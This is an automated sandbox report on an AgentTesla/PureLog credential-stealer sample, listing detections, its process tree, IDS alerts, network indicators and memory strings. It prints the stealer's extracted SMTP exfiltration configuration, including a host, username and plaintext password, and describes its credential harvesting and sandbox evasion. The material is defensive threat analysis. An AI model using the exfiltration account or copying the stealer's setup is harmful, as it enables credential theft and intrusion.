Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Copy#51007602.exe

Overview

General Information

Sample name:Copy#51007602.exe
Analysis ID:1448039
MD5:d503277ebd054e3a3ccfe906cac2e6d8
SHA1:f209eb92df97e2569897f5da1097ae0d5b8d4bdb
SHA256:7c9fb1f9b7c24c9e0608af47b246b224e295ebc18aecfee6a104a7046d9db19a
Tags:AgentTeslaexe
Infos:

Detection

AgentTesla, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected PureLog Stealer
.NET source code contains potential unpacker
AI detected suspicious sample
Drops large PE files
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Outbound SMTP Connections
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Copy#51007602.exe (PID: 6008 cmdline: "C:\Users\user\Desktop\Copy#51007602.exe" MD5: D503277EBD054E3A3CCFE906CAC2E6D8)
    • Copy#51007602.exe (PID: 4084 cmdline: "C:\Users\user\Desktop\Copy#51007602.exe" MD5: D503277EBD054E3A3CCFE906CAC2E6D8)
  • itdtn.exe (PID: 2604 cmdline: "C:\Users\user\AppData\Roaming\itdtn.exe" MD5: C62B7992DB97A6341DACBE7E3D936C74)
    • itdtn.exe (PID: 3936 cmdline: "C:\Users\user\AppData\Roaming\itdtn.exe" MD5: C62B7992DB97A6341DACBE7E3D936C74)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "jahnindustry.shop", "Username": "sendanell@jahnindustry.shop", "Password": "WmfkJ55yPdtj"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000004.00000002.2235868873.0000000004CA6000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
      00000000.00000002.2114770908.00000000045DE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        00000004.00000002.2235868873.0000000004DBE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          00000005.00000002.3236815937.0000000003347000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            00000004.00000002.2235868873.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              Click to see the 34 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              4.2.itdtn.exe.4cce790.10.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                4.2.itdtn.exe.4ca6770.15.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                  0.2.Copy#51007602.exe.45de7d0.10.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                    4.2.itdtn.exe.4d1e7b0.3.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                      4.2.itdtn.exe.4dbe7d0.6.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                        Click to see the 38 entries

                        Sigma Signatures

                        System Summary

                        barindex
                        Sigma detected: CurrentVersion Autorun Keys Modification
                        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\itdtn.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Copy#51007602.exe, ProcessId: 6008, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\itdtn
                        Sigma detected: Suspicious Outbound SMTP Connections
                        Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 66.29.151.236, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\Copy#51007602.exe, Initiated: true, ProcessId: 4084, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49705

                        Snort Signatures

                        Timestamp:05/27/24-15:15:09.558181
                        SID:2851779
                        Source Port:49705
                        Destination Port:587
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:05/27/24-15:15:21.815023
                        SID:2855542
                        Source Port:49715
                        Destination Port:587
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:05/27/24-15:15:21.815023
                        SID:2855245
                        Source Port:49715
                        Destination Port:587
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:05/27/24-15:15:21.815023
                        SID:2840032
                        Source Port:49715
                        Destination Port:587
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:05/27/24-15:15:21.815023
                        SID:2851779
                        Source Port:49715
                        Destination Port:587
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:05/27/24-15:15:09.558181
                        SID:2855542
                        Source Port:49705
                        Destination Port:587
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:05/27/24-15:15:09.558181
                        SID:2855245
                        Source Port:49705
                        Destination Port:587
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:05/27/24-15:15:09.558181
                        SID:2840032
                        Source Port:49705
                        Destination Port:587
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:05/27/24-15:15:21.814973
                        SID:2030171
                        Source Port:49715
                        Destination Port:587
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:05/27/24-15:15:09.558132
                        SID:2030171
                        Source Port:49705
                        Destination Port:587
                        Protocol:TCP
                        Classtype:A Network Trojan was detected

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Antivirus detection for dropped file
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeAvira: detection malicious, Label: HEUR/AGEN.1332199
                        Found malware configuration
                        Source: 4.2.itdtn.exe.506b9a8.11.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "jahnindustry.shop", "Username": "sendanell@jahnindustry.shop", "Password": "WmfkJ55yPdtj"}
                        Multi AV Scanner detection for submitted file
                        Source: Copy#51007602.exeVirustotal: Detection: 28%Perma Link
                        Source: Copy#51007602.exeReversingLabs: Detection: 15%
                        AI detected suspicious sample
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.5% probability
                        Machine Learning detection for dropped file
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeJoe Sandbox ML: detected
                        Machine Learning detection for sample
                        Source: Copy#51007602.exeJoe Sandbox ML: detected
                        Source: Copy#51007602.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                        Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49704 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49714 version: TLS 1.2
                        Source: Copy#51007602.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Copy#51007602.exe, 00000000.00000002.2111351064.0000000002CEE000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2126157017.0000000005510000.00000004.08000000.00040000.00000000.sdmp, itdtn.exe, 00000004.00000002.2235868873.0000000004F89000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000004.00000002.2235868873.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000004.00000002.2229535791.000000000357C000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Copy#51007602.exe, 00000000.00000002.2111351064.0000000002CEE000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2126157017.0000000005510000.00000004.08000000.00040000.00000000.sdmp, itdtn.exe, 00000004.00000002.2235868873.0000000004F89000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000004.00000002.2235868873.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000004.00000002.2229535791.000000000357C000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: protobuf-net.pdbSHA256}Lq source: Copy#51007602.exe, 00000000.00000002.2114770908.00000000045F2000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2114770908.00000000046BE000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2123138110.0000000004F30000.00000004.08000000.00040000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2111351064.0000000002B74000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000004.00000002.2229535791.0000000003371000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: protobuf-net.pdb source: Copy#51007602.exe, 00000000.00000002.2114770908.00000000045F2000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2114770908.00000000046BE000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2123138110.0000000004F30000.00000004.08000000.00040000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2111351064.0000000002B74000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000004.00000002.2229535791.0000000003371000.00000004.00000800.00020000.00000000.sdmp
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h0_2_0548D9B8
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h0_2_05508112
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h0_2_05508118
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h0_2_055080D2
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h4_2_05D2D9B8
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h4_2_05E17BF3
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h4_2_05E17BF8

                        Networking

                        barindex
                        Snort IDS alert for network traffic
                        Source: TrafficSnort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.5:49705 -> 66.29.151.236:587
                        Source: TrafficSnort IDS: 2855245 ETPRO TROJAN Agent Tesla Exfil via SMTP 192.168.2.5:49705 -> 66.29.151.236:587
                        Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.5:49705 -> 66.29.151.236:587
                        Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.5:49705 -> 66.29.151.236:587
                        Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.5:49705 -> 66.29.151.236:587
                        Source: TrafficSnort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.5:49715 -> 66.29.151.236:587
                        Source: TrafficSnort IDS: 2855245 ETPRO TROJAN Agent Tesla Exfil via SMTP 192.168.2.5:49715 -> 66.29.151.236:587
                        Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.5:49715 -> 66.29.151.236:587
                        Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.5:49715 -> 66.29.151.236:587
                        Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.5:49715 -> 66.29.151.236:587
                        Yara detected Generic Downloader
                        Source: Yara matchFile source: 0.2.Copy#51007602.exe.40111f0.11.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Copy#51007602.exe.3de7dd0.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Copy#51007602.exe.3bbe9a0.3.raw.unpack, type: UNPACKEDPE
                        Source: global trafficTCP traffic: 192.168.2.5:49705 -> 66.29.151.236:587
                        Source: Joe Sandbox ViewIP Address: 66.29.151.236 66.29.151.236
                        Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                        Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                        Source: Joe Sandbox ViewASN Name: ADVANTAGECOMUS ADVANTAGECOMUS
                        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                        Source: unknownDNS query: name: api.ipify.org
                        Source: unknownDNS query: name: api.ipify.org
                        Source: unknownDNS query: name: api.ipify.org
                        Source: global trafficTCP traffic: 192.168.2.5:49705 -> 66.29.151.236:587
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                        Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                        Source: global trafficDNS traffic detected: DNS query: jahnindustry.shop
                        Source: Copy#51007602.exe, 00000002.00000002.3235618888.0000000003307000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000005.00000002.3236815937.0000000003347000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jahnindustry.shop
                        Source: Copy#51007602.exe, 00000000.00000002.2111351064.0000000002CEE000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000002.00000002.3235618888.0000000003291000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000004.00000002.2229535791.000000000357C000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000005.00000002.3236815937.00000000032DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: Copy#51007602.exe, 00000000.00000002.2114770908.0000000003991000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2111351064.0000000002B74000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000004.00000002.2235868873.0000000005056000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000004.00000002.2229535791.0000000003633000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000005.00000002.3231826482.000000000042F000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                        Source: Copy#51007602.exe, 00000000.00000002.2114770908.0000000003991000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2111351064.0000000002B74000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000002.00000002.3235618888.0000000003291000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000004.00000002.2235868873.0000000005056000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000004.00000002.2229535791.0000000003633000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000005.00000002.3231826482.000000000042F000.00000040.00000400.00020000.00000000.sdmp, itdtn.exe, 00000005.00000002.3236815937.00000000032DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                        Source: Copy#51007602.exe, 00000002.00000002.3235618888.0000000003291000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000005.00000002.3236815937.00000000032DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                        Source: Copy#51007602.exe, 00000002.00000002.3235618888.0000000003291000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000005.00000002.3236815937.00000000032DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                        Source: Copy#51007602.exe, 00000000.00000002.2114770908.00000000045F2000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2114770908.00000000046BE000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2123138110.0000000004F30000.00000004.08000000.00040000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2111351064.0000000002B74000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000004.00000002.2229535791.0000000003371000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                        Source: Copy#51007602.exe, 00000000.00000002.2114770908.00000000045F2000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2114770908.00000000046BE000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2123138110.0000000004F30000.00000004.08000000.00040000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2111351064.0000000002B74000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000004.00000002.2229535791.0000000003371000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                        Source: Copy#51007602.exe, 00000000.00000002.2114770908.00000000045F2000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2114770908.00000000046BE000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2123138110.0000000004F30000.00000004.08000000.00040000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2111351064.0000000002B74000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000004.00000002.2229535791.0000000003371000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                        Source: Copy#51007602.exe, 00000000.00000002.2114770908.00000000045F2000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2114770908.00000000046BE000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2123138110.0000000004F30000.00000004.08000000.00040000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2111351064.0000000002B74000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000004.00000002.2229535791.0000000003371000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                        Source: Copy#51007602.exe, 00000000.00000002.2114770908.00000000045F2000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2111351064.0000000002CEE000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2114770908.00000000046BE000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2123138110.0000000004F30000.00000004.08000000.00040000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2111351064.0000000002B74000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000004.00000002.2229535791.0000000003371000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000004.00000002.2229535791.00000000034EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                        Source: Copy#51007602.exe, 00000000.00000002.2114770908.00000000045F2000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2114770908.00000000046BE000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2123138110.0000000004F30000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                        Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49704 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49714 version: TLS 1.2

                        System Summary

                        barindex
                        Malicious sample detected (through community Yara rule)
                        Source: 4.2.itdtn.exe.506b9a8.11.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 4.2.itdtn.exe.506b9a8.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 0.2.Copy#51007602.exe.40111f0.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 0.2.Copy#51007602.exe.3de7dd0.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 0.2.Copy#51007602.exe.3bbe9a0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Drops large PE files
                        Source: C:\Users\user\Desktop\Copy#51007602.exeFile dump: itdtn.exe.0.dr 293997803Jump to dropped file
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 0_2_00F150C80_2_00F150C8
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 0_2_00F1B1A70_2_00F1B1A7
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 0_2_00F1C5C40_2_00F1C5C4
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 0_2_00F18AF00_2_00F18AF0
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 0_2_00F16C6C0_2_00F16C6C
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 0_2_00F150B80_2_00F150B8
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 0_2_00F188380_2_00F18838
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 0_2_00F188280_2_00F18828
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 0_2_00F1880F0_2_00F1880F
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 0_2_00F18ADF0_2_00F18ADF
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 0_2_04ED06D80_2_04ED06D8
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 0_2_04ED06D50_2_04ED06D5
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 0_2_04EF183F0_2_04EF183F
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 0_2_04EF2E580_2_04EF2E58
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 0_2_04EF1B770_2_04EF1B77
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 0_2_04F16E580_2_04F16E58
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 0_2_04F17B310_2_04F17B31
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 0_2_04F163380_2_04F16338
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 0_2_04F16E480_2_04F16E48
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 0_2_04F137AE0_2_04F137AE
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 0_2_04F1807E0_2_04F1807E
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 0_2_04F1705C0_2_04F1705C
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 0_2_04F100400_2_04F10040
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 0_2_04F100060_2_04F10006
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 0_2_04F169910_2_04F16991
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 0_2_04F11AA00_2_04F11AA0
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 0_2_04F11A900_2_04F11A90
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 0_2_04F163280_2_04F16328
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 0_2_0547DDD80_2_0547DDD8
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 0_2_054708080_2_05470808
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 0_2_0547D8C00_2_0547D8C0
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 0_2_0547FA800_2_0547FA80
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 0_2_0547DDC90_2_0547DDC9
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 0_2_05471D940_2_05471D94
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 0_2_0547D8B10_2_0547D8B1
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 0_2_0547FA500_2_0547FA50
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 0_2_0548F1080_2_0548F108
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 0_2_054800400_2_05480040
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 0_2_054800060_2_05480006
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 0_2_055091A20_2_055091A2
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 0_2_05508F430_2_05508F43
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 0_2_05508BB80_2_05508BB8
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 0_2_05508BA80_2_05508BA8
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 0_2_0572C8580_2_0572C858
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 0_2_057100400_2_05710040
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 0_2_0571003B0_2_0571003B
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 0_2_0571001F0_2_0571001F
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 2_2_030FE6482_2_030FE648
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 2_2_030FAA282_2_030FAA28
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 2_2_030F4A982_2_030F4A98
